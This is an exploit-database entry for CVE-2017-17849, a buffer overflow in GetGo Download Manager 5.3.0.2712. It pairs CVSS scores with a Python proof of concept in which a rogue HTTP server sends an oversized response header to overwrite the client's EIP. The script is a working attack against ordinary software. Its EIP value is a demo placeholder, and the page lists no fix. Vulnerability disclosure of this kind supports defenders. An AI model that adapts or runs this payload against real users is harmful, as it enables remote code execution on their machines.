Lucene search

K
exploitdbAloyce J. MakalangaEDB-ID:43391
HistoryDec 26, 2017 - 12:00 a.m.

GetGo Download Manager 5.3.0.2712 - Buffer Overflow

2017-12-2600:00:00
Aloyce J. Makalanga
www.exploit-db.com
61

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.01

Percentile

83.5%

# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712
# CVE: CVE-2017-17849
# Date: 22-12-2017
# Tested on Windows 10 32 bits 
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Software Link: http://www.getgosoft.com/getgodm/ 
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution 


 
1. Description

A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer. 

   
2. Proof of Concept

 

def main():
    host = "192.168.205.128"
    port = 80

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, port))
    s.listen(1)
    print "\n[+] Listening on %d ..." % port

    cl, addr = s.accept()
    print "[+] Connection accepted from %s" % addr[0]

    evilbuffer = "A" * 4105
    hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo . As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this. 
    pads  = "C"*(6000 - len(evilbuffer + hardCodedEIP))
    payload = evilbuffer + hardCodedEIP + pads

    buffer = "HTTP/1.1 200 " + payload + "\r\n"

    print cl.recv(1000)
    cl.send(buffer)
    print "[+] Sending buffer: OK\n"

    sleep(3)
    cl.close()
    s.close()

if __name__ == '__main__':
    import socket
    from time import sleep
    main()

3. Solution:

   No solution as of yet.

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.01

Percentile

83.5%